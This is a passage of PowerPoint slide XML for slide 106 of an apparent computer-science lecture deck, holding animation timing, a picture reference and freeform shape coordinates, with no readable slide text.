                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="5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62"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524000" y="1153633"/>
            <a:ext cx="533400" cy="381000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2770714" y="149384"/>
            <a:ext cx="5898470" cy="6540428"/>
            <a:chOff x="2770714" y="149384"/>
            <a:chExt cx="5898470" cy="6540428"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 2" descr="D:\Classes\CS 4700\assets\spamalytic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714" y="149384"/>
              <a:ext cx="5898470" cy="6540428"/>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5724171" y="1634169"/>
              <a:ext cx="606856" cy="370901"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 291039 w 606856"/>
                <a:gd name="connsiteY0" fmla="*/ 11017 h 370901"/>
                <a:gd name="connsiteX1" fmla="*/ 291039 w 606856"/>
                <a:gd name="connsiteY1" fmla="*/ 11017 h 370901"/>
                <a:gd name="connsiteX2" fmla="*/ 257988 w 606856"/>
                <a:gd name="connsiteY2" fmla="*/ 3672 h 370901"/>
                <a:gd name="connsiteX3" fmla="*/ 243299 w 606856"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 370901"/>
                <a:gd name="connsiteX4" fmla="*/ 158836 w 606856"/>
                <a:gd name="connsiteY4" fmla="*/ 3672 h 370901"/>
                <a:gd name="connsiteX5" fmla="*/ 118441 w 606856"/>
                <a:gd name="connsiteY5" fmla="*/ 14689 h 370901"/>
                <a:gd name="connsiteX6" fmla="*/ 96407 w 606856"/>
                <a:gd name="connsiteY6" fmla="*/ 18361 h 370901"/>
                <a:gd name="connsiteX7" fmla="*/ 74374 w 606856"/>
                <a:gd name="connsiteY7" fmla="*/ 25706 h 370901"/>
                <a:gd name="connsiteX8" fmla="*/ 63357 w 606856"/>
                <a:gd name="connsiteY8" fmla="*/ 29378 h 370901"/>
                <a:gd name="connsiteX9" fmla="*/ 52340 w 606856"/>
                <a:gd name="connsiteY9" fmla="*/ 33050 h 370901"/>
                <a:gd name="connsiteX10" fmla="*/ 26634 w 606856"/>
                <a:gd name="connsiteY10" fmla="*/ 62429 h 370901"/>
                <a:gd name="connsiteX11" fmla="*/ 11945 w 606856"/>
                <a:gd name="connsiteY11" fmla="*/ 84462 h 370901"/>
                <a:gd name="connsiteX12" fmla="*/ 928 w 606856"/>
                <a:gd name="connsiteY12" fmla="*/ 128530 h 370901"/>
                <a:gd name="connsiteX13" fmla="*/ 8272 w 606856"/>
                <a:gd name="connsiteY13" fmla="*/ 231354 h 370901"/>
                <a:gd name="connsiteX14" fmla="*/ 15617 w 606856"/>
                <a:gd name="connsiteY14" fmla="*/ 246043 h 370901"/>
                <a:gd name="connsiteX15" fmla="*/ 26634 w 606856"/>
                <a:gd name="connsiteY15" fmla="*/ 268077 h 370901"/>
                <a:gd name="connsiteX16" fmla="*/ 41323 w 606856"/>
                <a:gd name="connsiteY16" fmla="*/ 275421 h 370901"/>
                <a:gd name="connsiteX17" fmla="*/ 67029 w 606856"/>
                <a:gd name="connsiteY17" fmla="*/ 297455 h 370901"/>
                <a:gd name="connsiteX18" fmla="*/ 89063 w 606856"/>
                <a:gd name="connsiteY18" fmla="*/ 304800 h 370901"/>
                <a:gd name="connsiteX19" fmla="*/ 100080 w 606856"/>
                <a:gd name="connsiteY19" fmla="*/ 308472 h 370901"/>
                <a:gd name="connsiteX20" fmla="*/ 111096 w 606856"/>
                <a:gd name="connsiteY20" fmla="*/ 315817 h 370901"/>
                <a:gd name="connsiteX21" fmla="*/ 158836 w 606856"/>
                <a:gd name="connsiteY21" fmla="*/ 326833 h 370901"/>
                <a:gd name="connsiteX22" fmla="*/ 180870 w 606856"/>
                <a:gd name="connsiteY22" fmla="*/ 337850 h 370901"/>
                <a:gd name="connsiteX23" fmla="*/ 191887 w 606856"/>
                <a:gd name="connsiteY23" fmla="*/ 341523 h 370901"/>
                <a:gd name="connsiteX24" fmla="*/ 228610 w 606856"/>
                <a:gd name="connsiteY24" fmla="*/ 348867 h 370901"/>
                <a:gd name="connsiteX25" fmla="*/ 291039 w 606856"/>
                <a:gd name="connsiteY25" fmla="*/ 359884 h 370901"/>
                <a:gd name="connsiteX26" fmla="*/ 302056 w 606856"/>
                <a:gd name="connsiteY26" fmla="*/ 363556 h 370901"/>
                <a:gd name="connsiteX27" fmla="*/ 324089 w 606856"/>
                <a:gd name="connsiteY27" fmla="*/ 367229 h 370901"/>
                <a:gd name="connsiteX28" fmla="*/ 338778 w 606856"/>
                <a:gd name="connsiteY28" fmla="*/ 370901 h 370901"/>
                <a:gd name="connsiteX29" fmla="*/ 456292 w 606856"/>
                <a:gd name="connsiteY29" fmla="*/ 367229 h 370901"/>
                <a:gd name="connsiteX30" fmla="*/ 485670 w 606856"/>
                <a:gd name="connsiteY30" fmla="*/ 356212 h 370901"/>
                <a:gd name="connsiteX31" fmla="*/ 511376 w 606856"/>
                <a:gd name="connsiteY31" fmla="*/ 348867 h 370901"/>
                <a:gd name="connsiteX32" fmla="*/ 533410 w 606856"/>
                <a:gd name="connsiteY32" fmla="*/ 337850 h 370901"/>
                <a:gd name="connsiteX33" fmla="*/ 544427 w 606856"/>
                <a:gd name="connsiteY33" fmla="*/ 326833 h 370901"/>
                <a:gd name="connsiteX34" fmla="*/ 555443 w 606856"/>
                <a:gd name="connsiteY34" fmla="*/ 319489 h 370901"/>
                <a:gd name="connsiteX35" fmla="*/ 570133 w 606856"/>
                <a:gd name="connsiteY35" fmla="*/ 293783 h 370901"/>
                <a:gd name="connsiteX36" fmla="*/ 573805 w 606856"/>
                <a:gd name="connsiteY36" fmla="*/ 282766 h 370901"/>
                <a:gd name="connsiteX37" fmla="*/ 581149 w 606856"/>
                <a:gd name="connsiteY37" fmla="*/ 271749 h 370901"/>
                <a:gd name="connsiteX38" fmla="*/ 584822 w 606856"/>
                <a:gd name="connsiteY38" fmla="*/ 260732 h 370901"/>
                <a:gd name="connsiteX39" fmla="*/ 592166 w 606856"/>
                <a:gd name="connsiteY39" fmla="*/ 246043 h 370901"/>
                <a:gd name="connsiteX40" fmla="*/ 603183 w 606856"/>
                <a:gd name="connsiteY40" fmla="*/ 212992 h 370901"/>
                <a:gd name="connsiteX41" fmla="*/ 606856 w 606856"/>
                <a:gd name="connsiteY41" fmla="*/ 201976 h 370901"/>
                <a:gd name="connsiteX42" fmla="*/ 603183 w 606856"/>
                <a:gd name="connsiteY42" fmla="*/ 143219 h 370901"/>
                <a:gd name="connsiteX43" fmla="*/ 566460 w 606856"/>
                <a:gd name="connsiteY43" fmla="*/ 106496 h 370901"/>
                <a:gd name="connsiteX44" fmla="*/ 551771 w 606856"/>
                <a:gd name="connsiteY44" fmla="*/ 99151 h 370901"/>
                <a:gd name="connsiteX45" fmla="*/ 529737 w 606856"/>
                <a:gd name="connsiteY45" fmla="*/ 91807 h 370901"/>
                <a:gd name="connsiteX46" fmla="*/ 518721 w 606856"/>
                <a:gd name="connsiteY46" fmla="*/ 88135 h 370901"/>
                <a:gd name="connsiteX47" fmla="*/ 507704 w 606856"/>
                <a:gd name="connsiteY47" fmla="*/ 84462 h 370901"/>
                <a:gd name="connsiteX48" fmla="*/ 493015 w 606856"/>
                <a:gd name="connsiteY48" fmla="*/ 80790 h 370901"/>
                <a:gd name="connsiteX49" fmla="*/ 470981 w 606856"/>
                <a:gd name="connsiteY49" fmla="*/ 73445 h 370901"/>
                <a:gd name="connsiteX50" fmla="*/ 445275 w 606856"/>
                <a:gd name="connsiteY50" fmla="*/ 66101 h 370901"/>
                <a:gd name="connsiteX51" fmla="*/ 434258 w 606856"/>
                <a:gd name="connsiteY51" fmla="*/ 58756 h 370901"/>
                <a:gd name="connsiteX52" fmla="*/ 412224 w 606856"/>
                <a:gd name="connsiteY52" fmla="*/ 51412 h 370901"/>
                <a:gd name="connsiteX53" fmla="*/ 390190 w 606856"/>
                <a:gd name="connsiteY53" fmla="*/ 44067 h 370901"/>
                <a:gd name="connsiteX54" fmla="*/ 346123 w 606856"/>
                <a:gd name="connsiteY54" fmla="*/ 29378 h 370901"/>
                <a:gd name="connsiteX55" fmla="*/ 335106 w 606856"/>
                <a:gd name="connsiteY55" fmla="*/ 25706 h 370901"/>
                <a:gd name="connsiteX56" fmla="*/ 324089 w 606856"/>
                <a:gd name="connsiteY56" fmla="*/ 22033 h 370901"/>
                <a:gd name="connsiteX57" fmla="*/ 291039 w 606856"/>
                <a:gd name="connsiteY57" fmla="*/ 11017 h 37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6856" h="370901">
                  <a:moveTo>
                    <a:pt x="291039" y="11017"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291039" y="11017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257988" y="3672"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253070" y="2537"/>
                    <a:pt x="248346" y="0"/>
                    <a:pt x="243299" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215118" y="0"/>
                    <a:pt x="186990" y="2448"/>
                    <a:pt x="158836" y="3672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144599" y="8417"/>
                    <a:pt x="135000" y="11929"/>
                    <a:pt x="118441" y="14689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111096" y="15913"/>
                    <a:pt x="103631" y="16555"/>
                    <a:pt x="96407" y="18361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88896" y="20239"/>
                    <a:pt x="81718" y="23258"/>
                    <a:pt x="74374" y="25706"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63357" y="29378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52340" y="33050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33978" y="45292"/>
                    <a:pt x="43773" y="36722"/>
                    <a:pt x="26634" y="62429"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11945" y="84462"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2245" y="113560"/>
                    <a:pt x="5873" y="98859"/>
                    <a:pt x="928" y="128530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1645" y="146469"/>
                    <a:pt x="-4691" y="201107"/>
                    <a:pt x="8272" y="231354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10428" y="236386"/>
                    <a:pt x="13461" y="241011"/>
                    <a:pt x="15617" y="246043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19238" y="254492"/>
                    <a:pt x="18791" y="261541"/>
                    <a:pt x="26634" y="268077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30839" y="271581"/>
                    <a:pt x="36427" y="272973"/>
                    <a:pt x="41323" y="275421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48606" y="282705"/>
                    <a:pt x="56959" y="292980"/>
                    <a:pt x="67029" y="297455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74104" y="300599"/>
                    <a:pt x="81718" y="302352"/>
                    <a:pt x="89063" y="304800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100080" y="308472"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="103752" y="310920"/>
                    <a:pt x="106948" y="314309"/>
                    <a:pt x="111096" y="315817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131207" y="323130"/>
                    <a:pt x="140051" y="322137"/>
                    <a:pt x="158836" y="326833"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177292" y="331447"/>
                    <a:pt x="162924" y="328877"/>
                    <a:pt x="180870" y="337850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184332" y="339581"/>
                    <a:pt x="188165" y="340459"/>
                    <a:pt x="191887" y="341523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209711" y="346616"/>
                    <a:pt x="207629" y="344933"/>
                    <a:pt x="228610" y="348867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286486" y="359719"/>
                    <a:pt x="244193" y="353192"/>
                    <a:pt x="291039" y="359884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294711" y="361108"/>
                    <a:pt x="298277" y="362716"/>
                    <a:pt x="302056" y="363556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309324" y="365171"/>
                    <a:pt x="316788" y="365769"/>
                    <a:pt x="324089" y="367229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329038" y="368219"/>
                    <a:pt x="333882" y="369677"/>
                    <a:pt x="338778" y="370901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377949" y="369677"/>
                    <a:pt x="417159" y="369344"/>
                    <a:pt x="456292" y="367229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="484707" y="365693"/>
                    <a:pt x="465410" y="364895"/>
                    <a:pt x="485670" y="356212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="502133" y="349157"/>
                    <a:pt x="497091" y="356009"/>
                    <a:pt x="511376" y="348867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="539860" y="334626"/>
                    <a:pt x="505711" y="347085"/>
                    <a:pt x="533410" y="337850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537082" y="334178"/>
                    <a:pt x="540437" y="330158"/>
                    <a:pt x="544427" y="326833"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="547817" y="324008"/>
                    <a:pt x="552322" y="322610"/>
                    <a:pt x="555443" y="319489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560053" y="314879"/>
                    <a:pt x="567973" y="298823"/>
                    <a:pt x="570133" y="293783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571658" y="290225"/>
                    <a:pt x="572074" y="286228"/>
                    <a:pt x="573805" y="282766"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="575779" y="278818"/>
                    <a:pt x="579175" y="275697"/>
                    <a:pt x="581149" y="271749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="582880" y="268287"/>
                    <a:pt x="583297" y="264290"/>
                    <a:pt x="584822" y="260732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="586978" y="255700"/>
                    <a:pt x="590133" y="251126"/>
                    <a:pt x="592166" y="246043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592177" y="246015"/>
                    <a:pt x="601342" y="218515"/>
                    <a:pt x="603183" y="212992"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="606856" y="201976"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="605632" y="182390"/>
                    <a:pt x="607532" y="162355"/>
                    <a:pt x="603183" y="143219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="599416" y="126645"/>
                    <a:pt x="580020" y="113277"/>
                    <a:pt x="566460" y="106496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="561564" y="104048"/>
                    <a:pt x="556854" y="101184"/>
                    <a:pt x="551771" y="99151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544583" y="96276"/>
                    <a:pt x="537082" y="94255"/>
                    <a:pt x="529737" y="91807"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="518721" y="88135"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="515049" y="86911"/>
                    <a:pt x="511459" y="85401"/>
                    <a:pt x="507704" y="84462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="502808" y="83238"/>
                    <a:pt x="497849" y="82240"/>
                    <a:pt x="493015" y="80790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485600" y="78565"/>
                    <a:pt x="478492" y="75323"/>
                    <a:pt x="470981" y="73445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452537" y="68834"/>
                    <a:pt x="461080" y="71369"/>
                    <a:pt x="445275" y="66101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441603" y="63653"/>
                    <a:pt x="438291" y="60549"/>
                    <a:pt x="434258" y="58756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427183" y="55612"/>
                    <a:pt x="419569" y="53860"/>
                    <a:pt x="412224" y="51412"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="390190" y="44067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346123" y="29378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335106" y="25706"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="331434" y="24482"/>
                    <a:pt x="327960" y="22033"/>
                    <a:pt x="324089" y="22033"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="291039" y="11017"/>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638101" y="1531345"/>
              <a:ext cx="444347" cy="381918"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 11017 w 444347"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 381918"/>
                <a:gd name="connsiteX1" fmla="*/ 11017 w 444347"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 381918"/>
                <a:gd name="connsiteX2" fmla="*/ 47740 w 444347"/>
                <a:gd name="connsiteY2" fmla="*/ 11016 h 381918"/>
                <a:gd name="connsiteX3" fmla="*/ 62429 w 444347"/>
                <a:gd name="connsiteY3" fmla="*/ 18361 h 381918"/>
                <a:gd name="connsiteX4" fmla="*/ 84463 w 444347"/>
                <a:gd name="connsiteY4" fmla="*/ 25706 h 381918"/>
                <a:gd name="connsiteX5" fmla="*/ 95480 w 444347"/>
                <a:gd name="connsiteY5" fmla="*/ 29378 h 381918"/>
                <a:gd name="connsiteX6" fmla="*/ 106497 w 444347"/>
                <a:gd name="connsiteY6" fmla="*/ 36722 h 381918"/>
                <a:gd name="connsiteX7" fmla="*/ 146892 w 444347"/>
                <a:gd name="connsiteY7" fmla="*/ 44067 h 381918"/>
                <a:gd name="connsiteX8" fmla="*/ 209321 w 444347"/>
                <a:gd name="connsiteY8" fmla="*/ 51412 h 381918"/>
                <a:gd name="connsiteX9" fmla="*/ 235027 w 444347"/>
                <a:gd name="connsiteY9" fmla="*/ 55084 h 381918"/>
                <a:gd name="connsiteX10" fmla="*/ 249716 w 444347"/>
                <a:gd name="connsiteY10" fmla="*/ 58756 h 381918"/>
                <a:gd name="connsiteX11" fmla="*/ 286439 w 444347"/>
                <a:gd name="connsiteY11" fmla="*/ 62428 h 381918"/>
                <a:gd name="connsiteX12" fmla="*/ 304800 w 444347"/>
                <a:gd name="connsiteY12" fmla="*/ 66101 h 381918"/>
                <a:gd name="connsiteX13" fmla="*/ 319489 w 444347"/>
                <a:gd name="connsiteY13" fmla="*/ 69773 h 381918"/>
                <a:gd name="connsiteX14" fmla="*/ 345195 w 444347"/>
                <a:gd name="connsiteY14" fmla="*/ 73445 h 381918"/>
                <a:gd name="connsiteX15" fmla="*/ 378246 w 444347"/>
                <a:gd name="connsiteY15" fmla="*/ 88135 h 381918"/>
                <a:gd name="connsiteX16" fmla="*/ 392935 w 444347"/>
                <a:gd name="connsiteY16" fmla="*/ 110168 h 381918"/>
                <a:gd name="connsiteX17" fmla="*/ 403952 w 444347"/>
                <a:gd name="connsiteY17" fmla="*/ 132202 h 381918"/>
                <a:gd name="connsiteX18" fmla="*/ 418641 w 444347"/>
                <a:gd name="connsiteY18" fmla="*/ 176269 h 381918"/>
                <a:gd name="connsiteX19" fmla="*/ 422313 w 444347"/>
                <a:gd name="connsiteY19" fmla="*/ 187286 h 381918"/>
                <a:gd name="connsiteX20" fmla="*/ 425986 w 444347"/>
                <a:gd name="connsiteY20" fmla="*/ 198303 h 381918"/>
                <a:gd name="connsiteX21" fmla="*/ 433330 w 444347"/>
                <a:gd name="connsiteY21" fmla="*/ 268077 h 381918"/>
                <a:gd name="connsiteX22" fmla="*/ 440675 w 444347"/>
                <a:gd name="connsiteY22" fmla="*/ 290110 h 381918"/>
                <a:gd name="connsiteX23" fmla="*/ 444347 w 444347"/>
                <a:gd name="connsiteY23" fmla="*/ 301127 h 381918"/>
                <a:gd name="connsiteX24" fmla="*/ 440675 w 444347"/>
                <a:gd name="connsiteY24" fmla="*/ 367228 h 381918"/>
                <a:gd name="connsiteX25" fmla="*/ 437003 w 444347"/>
                <a:gd name="connsiteY25" fmla="*/ 378245 h 381918"/>
                <a:gd name="connsiteX26" fmla="*/ 425986 w 444347"/>
                <a:gd name="connsiteY26" fmla="*/ 381918 h 381918"/>
                <a:gd name="connsiteX27" fmla="*/ 359885 w 444347"/>
                <a:gd name="connsiteY27" fmla="*/ 374573 h 381918"/>
                <a:gd name="connsiteX28" fmla="*/ 337851 w 444347"/>
                <a:gd name="connsiteY28" fmla="*/ 367228 h 381918"/>
                <a:gd name="connsiteX29" fmla="*/ 312145 w 444347"/>
                <a:gd name="connsiteY29" fmla="*/ 356212 h 381918"/>
                <a:gd name="connsiteX30" fmla="*/ 290111 w 444347"/>
                <a:gd name="connsiteY30" fmla="*/ 348867 h 381918"/>
                <a:gd name="connsiteX31" fmla="*/ 279094 w 444347"/>
                <a:gd name="connsiteY31" fmla="*/ 341522 h 381918"/>
                <a:gd name="connsiteX32" fmla="*/ 257060 w 444347"/>
                <a:gd name="connsiteY32" fmla="*/ 334178 h 381918"/>
                <a:gd name="connsiteX33" fmla="*/ 168926 w 444347"/>
                <a:gd name="connsiteY33" fmla="*/ 326833 h 381918"/>
                <a:gd name="connsiteX34" fmla="*/ 146892 w 444347"/>
                <a:gd name="connsiteY34" fmla="*/ 319489 h 381918"/>
                <a:gd name="connsiteX35" fmla="*/ 135875 w 444347"/>
                <a:gd name="connsiteY35" fmla="*/ 315816 h 381918"/>
                <a:gd name="connsiteX36" fmla="*/ 113841 w 444347"/>
                <a:gd name="connsiteY36" fmla="*/ 293783 h 381918"/>
                <a:gd name="connsiteX37" fmla="*/ 95480 w 444347"/>
                <a:gd name="connsiteY37" fmla="*/ 275421 h 381918"/>
                <a:gd name="connsiteX38" fmla="*/ 88135 w 444347"/>
                <a:gd name="connsiteY38" fmla="*/ 264404 h 381918"/>
                <a:gd name="connsiteX39" fmla="*/ 77118 w 444347"/>
                <a:gd name="connsiteY39" fmla="*/ 257060 h 381918"/>
                <a:gd name="connsiteX40" fmla="*/ 62429 w 444347"/>
                <a:gd name="connsiteY40" fmla="*/ 235026 h 381918"/>
                <a:gd name="connsiteX41" fmla="*/ 58757 w 444347"/>
                <a:gd name="connsiteY41" fmla="*/ 224009 h 381918"/>
                <a:gd name="connsiteX42" fmla="*/ 51412 w 444347"/>
                <a:gd name="connsiteY42" fmla="*/ 212992 h 381918"/>
                <a:gd name="connsiteX43" fmla="*/ 47740 w 444347"/>
                <a:gd name="connsiteY43" fmla="*/ 198303 h 381918"/>
                <a:gd name="connsiteX44" fmla="*/ 40395 w 444347"/>
                <a:gd name="connsiteY44" fmla="*/ 176269 h 381918"/>
                <a:gd name="connsiteX45" fmla="*/ 36723 w 444347"/>
                <a:gd name="connsiteY45" fmla="*/ 165253 h 381918"/>
                <a:gd name="connsiteX46" fmla="*/ 25706 w 444347"/>
                <a:gd name="connsiteY46" fmla="*/ 143219 h 381918"/>
                <a:gd name="connsiteX47" fmla="*/ 18362 w 444347"/>
                <a:gd name="connsiteY47" fmla="*/ 132202 h 381918"/>
                <a:gd name="connsiteX48" fmla="*/ 7345 w 444347"/>
                <a:gd name="connsiteY48" fmla="*/ 99151 h 381918"/>
                <a:gd name="connsiteX49" fmla="*/ 3672 w 444347"/>
                <a:gd name="connsiteY49" fmla="*/ 88135 h 381918"/>
                <a:gd name="connsiteX50" fmla="*/ 0 w 444347"/>
                <a:gd name="connsiteY50" fmla="*/ 77118 h 381918"/>
                <a:gd name="connsiteX51" fmla="*/ 11017 w 444347"/>
                <a:gd name="connsiteY51" fmla="*/ 0 h 38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4347" h="381918">
                  <a:moveTo>
                    <a:pt x="11017" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11017" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23258" y="3672"/>
                    <a:pt x="35705" y="6718"/>
                    <a:pt x="47740" y="11016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52895" y="12857"/>
                    <a:pt x="57346" y="16328"/>
                    <a:pt x="62429" y="18361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69617" y="21236"/>
                    <a:pt x="77118" y="23258"/>
                    <a:pt x="84463" y="25706"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88135" y="26930"/>
                    <a:pt x="92259" y="27231"/>
                    <a:pt x="95480" y="29378"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99152" y="31826"/>
                    <a:pt x="102440" y="34983"/>
                    <a:pt x="106497" y="36722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115298" y="40494"/>
                    <a:pt x="140688" y="43113"/>
                    <a:pt x="146892" y="44067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205322" y="53056"/>
                    <a:pt x="119638" y="41447"/>
                    <a:pt x="209321" y="51412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217924" y="52368"/>
                    <a:pt x="226511" y="53536"/>
                    <a:pt x="235027" y="55084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239993" y="55987"/>
                    <a:pt x="244720" y="58042"/>
                    <a:pt x="249716" y="58756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261894" y="60496"/>
                    <a:pt x="274198" y="61204"/>
                    <a:pt x="286439" y="62428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292559" y="63652"/>
                    <a:pt x="298707" y="64747"/>
                    <a:pt x="304800" y="66101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309727" y="67196"/>
                    <a:pt x="314523" y="68870"/>
                    <a:pt x="319489" y="69773"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328005" y="71321"/>
                    <a:pt x="336626" y="72221"/>
                    <a:pt x="345195" y="73445"/>
                  </a:cubicBezTo>
